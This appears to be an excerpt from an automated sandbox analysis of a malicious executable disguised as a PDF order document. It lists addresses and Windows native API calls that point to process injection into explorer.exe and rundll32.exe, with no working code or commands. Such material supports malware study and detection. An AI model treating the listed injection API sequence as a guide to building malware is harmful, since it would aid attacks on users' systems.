          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01182BE0 NtQueryValueKey,4_2_01182BE0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01182AB0 NtWaitForSingleObject,4_2_01182AB0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01182AF0 NtWriteFile,4_2_01182AF0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01182D00 NtSetInformationFile,4_2_01182D00
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01182DB0 NtEnumerateKey,4_2_01182DB0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01182C00 NtQueryInformationProcess,4_2_01182C00
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01182C60 NtCreateKey,4_2_01182C60
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01182CC0 NtQueryVirtualMemory,4_2_01182CC0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01182CF0 NtOpenProcess,4_2_01182CF0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01182F60 NtCreateProcessEx,4_2_01182F60
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01182FA0 NtQuerySection,4_2_01182FA0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01182E30 NtWriteVirtualMemory,4_2_01182E30
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01182EE0 NtQueueApcThread,4_2_01182EE0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01183010 NtOpenDirectoryObject,4_2_01183010
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01183090 NtSetValueKey,4_2_01183090
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011835C0 NtCreateMutant,4_2_011835C0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011839B0 NtGetContextThread,4_2_011839B0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01183D10 NtOpenProcessToken,4_2_01183D10
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01183D70 NtOpenThread,4_2_01183D70
          Source: C:\Windows\explorer.exeCode function: 6_2_0F005E12 NtProtectVirtualMemory,6_2_0F005E12
          Source: C:\Windows\explorer.exeCode function: 6_2_0F004232 NtCreateFile,6_2_0F004232
          Source: C:\Windows\explorer.exeCode function: 6_2_0F005E0A NtProtectVirtualMemory,6_2_0F005E0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00A040B1 NtQuerySystemInformation,8_2_00A040B1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00A05CF1 NtQueryInformationToken,NtQueryInformationToken,RtlNtStatusToDosError,8_2_00A05CF1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00A04136 HeapSetInformation,NtSetInformationProcess,AttachConsole,LocalAlloc,LoadLibraryExW,GetProcAddress,SetErrorMode,FreeLibrary,LocalFree,DeactivateActCtx,ReleaseActCtx,FreeLibrary,LocalFree,FreeConsole,ExitProcess,8_2_00A04136
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00A05D6A NtOpenProcessToken,RtlNtStatusToDosError,NtClose,QueryActCtxW,NtOpenProcessToken,NtSetInformationToken,NtClose,8_2_00A05D6A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049A2CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_049A2CA0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049A2C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_049A2C70
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049A2C60 NtCreateKey,LdrInitializeThunk,8_2_049A2C60
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049A2DD0 NtDelayExecution,LdrInitializeThunk,8_2_049A2DD0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049A2DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_049A2DF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049A2D10 NtMapViewOfSection,LdrInitializeThunk,8_2_049A2D10
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049A2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_049A2EA0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049A2FE0 NtCreateFile,LdrInitializeThunk,8_2_049A2FE0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049A2F30 NtCreateSection,LdrInitializeThunk,8_2_049A2F30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049A2AD0 NtReadFile,LdrInitializeThunk,8_2_049A2AD0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049A2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_049A2BF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049A2BE0 NtQueryValueKey,LdrInitializeThunk,8_2_049A2BE0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049A2B60 NtClose,LdrInitializeThunk,8_2_049A2B60
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049A35C0 NtCreateMutant,LdrInitializeThunk,8_2_049A35C0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049A4650 NtSuspendThread,8_2_049A4650
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049A4340 NtSetContextThread,8_2_049A4340
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049A2CC0 NtQueryVirtualMemory,8_2_049A2CC0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049A2CF0 NtOpenProcess,8_2_049A2CF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049A2C00 NtQueryInformationProcess,8_2_049A2C00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049A2DB0 NtEnumerateKey,8_2_049A2DB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049A2D00 NtSetInformationFile,8_2_049A2D00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049A2D30 NtUnmapViewOfSection,8_2_049A2D30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049A2E80 NtReadVirtualMemory,8_2_049A2E80
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049A2EE0 NtQueueApcThread,8_2_049A2EE0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049A2E30 NtWriteVirtualMemory,8_2_049A2E30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049A2F90 NtProtectVirtualMemory,8_2_049A2F90
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049A2FB0 NtResumeThread,8_2_049A2FB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049A2FA0 NtQuerySection,8_2_049A2FA0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049A2F60 NtCreateProcessEx,8_2_049A2F60
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049A2AB0 NtWaitForSingleObject,8_2_049A2AB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049A2AF0 NtWriteFile,8_2_049A2AF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049A2B80 NtQueryInformationFile,8_2_049A2B80
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049A2BA0 NtEnumerateValueKey,8_2_049A2BA0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049A3090 NtSetValueKey,8_2_049A3090
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049A3010 NtOpenDirectoryObject,8_2_049A3010
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049A3D10 NtOpenProcessToken,8_2_049A3D10
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049A3D70 NtOpenThread,8_2_049A3D70
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049A39B0 NtGetContextThread,8_2_049A39B0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007AA350 NtCreateFile,8_2_007AA350
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007AA400 NtReadFile,8_2_007AA400
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007AA480 NtClose,8_2_007AA480
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007AA530 NtAllocateVirtualMemory,8_2_007AA530
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007AA34A NtCreateFile,8_2_007AA34A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007AA52A NtAllocateVirtualMemory,8_2_007AA52A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_047AA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,8_2_047AA036
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_047A9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,8_2_047A9BAF
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_047AA042 NtQueryInformationProcess,8_2_047AA042
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_047A9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_047A9BB2
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 0_2_0107D5BC0_2_0107D5BC
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 0_2_052766400_2_05276640
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 0_2_052766300_2_05276630
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 0_2_052700060_2_05270006
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 0_2_052700400_2_05270040
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 0_2_076149F80_2_076149F8
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 0_2_076100400_2_07610040
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 0_2_076100060_2_07610006
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_004010264_2_00401026
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_004010304_2_00401030
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0041EC614_2_0041EC61
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_00402D894_2_00402D89
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_00402D904_2_00402D90
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0041D5934_2_0041D593
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0041D5964_2_0041D596
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_00409E504_2_00409E50
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_00402FB04_2_00402FB0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011EA1184_2_011EA118
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011401004_2_01140100
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011D81584_2_011D8158
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_012041A24_2_012041A2
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_012101AA4_2_012101AA
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_012081CC4_2_012081CC
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011E20004_2_011E2000
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0120A3524_2_0120A352
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_012103E64_2_012103E6
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0115E3F04_2_0115E3F0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011F02744_2_011F0274
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011D02C04_2_011D02C0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011505354_2_01150535
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_012105914_2_01210591
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011F44204_2_011F4420
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_012024464_2_01202446
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011FE4F64_2_011FE4F6
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011747504_2_01174750
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011507704_2_01150770
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0114C7C04_2_0114C7C0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0116C6E04_2_0116C6E0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011669624_2_01166962
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0121A9A64_2_0121A9A6
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011529A04_2_011529A0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011528404_2_01152840
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0115A8404_2_0115A840
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011368B84_2_011368B8
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0117E8F04_2_0117E8F0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0120AB404_2_0120AB40
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01206BD74_2_01206BD7
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0114EA804_2_0114EA80
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011ECD1F4_2_011ECD1F
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0115AD004_2_0115AD00
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01168DBF4_2_01168DBF
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0114ADE04_2_0114ADE0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01150C004_2_01150C00
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011F0CB54_2_011F0CB5
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01140CF24_2_01140CF2
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01170F304_2_01170F30
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011F2F304_2_011F2F30
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01192F284_2_01192F28
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C4F404_2_011C4F40
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011CEFA04_2_011CEFA0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01142FC84_2_01142FC8
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0115CFE04_2_0115CFE0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0120EE264_2_0120EE26
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01150E594_2_01150E59
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01162E904_2_01162E90
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0120CE934_2_0120CE93
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0120EEDB4_2_0120EEDB
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0121B16B4_2_0121B16B
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0113F1724_2_0113F172
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0118516C4_2_0118516C
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0115B1B04_2_0115B1B0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0120F0E04_2_0120F0E0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_012070E94_2_012070E9
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011FF0CC4_2_011FF0CC
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011570C04_2_011570C0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0120132D4_2_0120132D
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0113D34C4_2_0113D34C
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0119739A4_2_0119739A
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011552A04_2_011552A0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0116B2C04_2_0116B2C0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011F12ED4_2_011F12ED
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_012075714_2_01207571
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011ED5B04_2_011ED5B0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0120F43F4_2_0120F43F
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011414604_2_01141460
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0120F7B04_2_0120F7B0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011956304_2_01195630
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_012016CC4_2_012016CC
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011E59104_2_011E5910
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011599504_2_01159950
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0116B9504_2_0116B950
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011BD8004_2_011BD800
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011538E04_2_011538E0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0120FB764_2_0120FB76
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0116FB804_2_0116FB80
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0118DBF94_2_0118DBF9
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C5BF04_2_011C5BF0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01207A464_2_01207A46
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0120FA494_2_0120FA49
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C3A6C4_2_011C3A6C
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011EDAAC4_2_011EDAAC
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01195AA04_2_01195AA0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011F1AA34_2_011F1AA3
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011FDAC64_2_011FDAC6
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01207D734_2_01207D73
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01153D404_2_01153D40
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01201D5A4_2_01201D5A
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0116FDC04_2_0116FDC0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011C9C324_2_011C9C32
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0120FCF24_2_0120FCF2
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0120FF094_2_0120FF09
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01151F924_2_01151F92
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0120FFB14_2_0120FFB1
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01159EB04_2_01159EB0
          Source: C:\Windows\explorer.exeCode function: 6_2_0F0042326_2_0F004232
          Source: C:\Windows\explorer.exeCode function: 6_2_0F0019126_2_0F001912
          Source: C:\Windows\explorer.exeCode function: 6_2_0EFFA0826_2_0EFFA082
          Source: C:\Windows\explorer.exeCode function: 6_2_0F0075CD6_2_0F0075CD
          Source: C:\Windows\explorer.exeCode function: 6_2_0F0030366_2_0F003036
          Source: C:\Windows\explorer.exeCode function: 6_2_0EFFEB326_2_0EFFEB32
          Source: C:\Windows\explorer.exeCode function: 6_2_0EFFEB306_2_0EFFEB30
          Source: C:\Windows\explorer.exeCode function: 6_2_0EFFBD026_2_0EFFBD02
          Source: C:\Windows\explorer.exeCode function: 6_2_0F9E2B326_2_0F9E2B32
          Source: C:\Windows\explorer.exeCode function: 6_2_0F9E2B306_2_0F9E2B30
          Source: C:\Windows\explorer.exeCode function: 6_2_0F9E82326_2_0F9E8232
          Source: C:\Windows\explorer.exeCode function: 6_2_0F9EB5CD6_2_0F9EB5CD
          Source: C:\Windows\explorer.exeCode function: 6_2_0F9E59126_2_0F9E5912
          Source: C:\Windows\explorer.exeCode function: 6_2_0F9DFD026_2_0F9DFD02
          Source: C:\Windows\explorer.exeCode function: 6_2_0F9DE0826_2_0F9DE082
          Source: C:\Windows\explorer.exeCode function: 6_2_0F9E70366_2_0F9E7036
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A1E4F68_2_04A1E4F6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A144208_2_04A14420
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A224468_2_04A22446
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A305918_2_04A30591
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049705358_2_04970535
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0498C6E08_2_0498C6E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0496C7C08_2_0496C7C0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049947508_2_04994750
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049707708_2_04970770
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A020008_2_04A02000
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A241A28_2_04A241A2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A301AA8_2_04A301AA
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A281CC8_2_04A281CC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049601008_2_04960100
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A0A1188_2_04A0A118
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049F81588_2_049F8158
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049F02C08_2_049F02C0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A102748_2_04A10274
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A303E68_2_04A303E6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0497E3F08_2_0497E3F0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A2A3528_2_04A2A352
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A10CB58_2_04A10CB5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04960CF28_2_04960CF2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04970C008_2_04970C00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04988DBF8_2_04988DBF
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0496ADE08_2_0496ADE0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0497AD008_2_0497AD00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A0CD1F8_2_04A0CD1F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04982E908_2_04982E90
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A2CE938_2_04A2CE93
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A2EEDB8_2_04A2EEDB
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A2EE268_2_04A2EE26
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04970E598_2_04970E59
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049EEFA08_2_049EEFA0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04962FC88_2_04962FC8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0497CFE08_2_0497CFE0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A12F308_2_04A12F30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04990F308_2_04990F30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049B2F288_2_049B2F28
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049E4F408_2_049E4F40
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049568B88_2_049568B8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0499E8F08_2_0499E8F0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049728408_2_04972840
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0497A8408_2_0497A840
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04A3A9A68_2_04A3A9A6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049729A08_2_049729A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049869628_2_04986962
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0496EA808_2_0496EA80
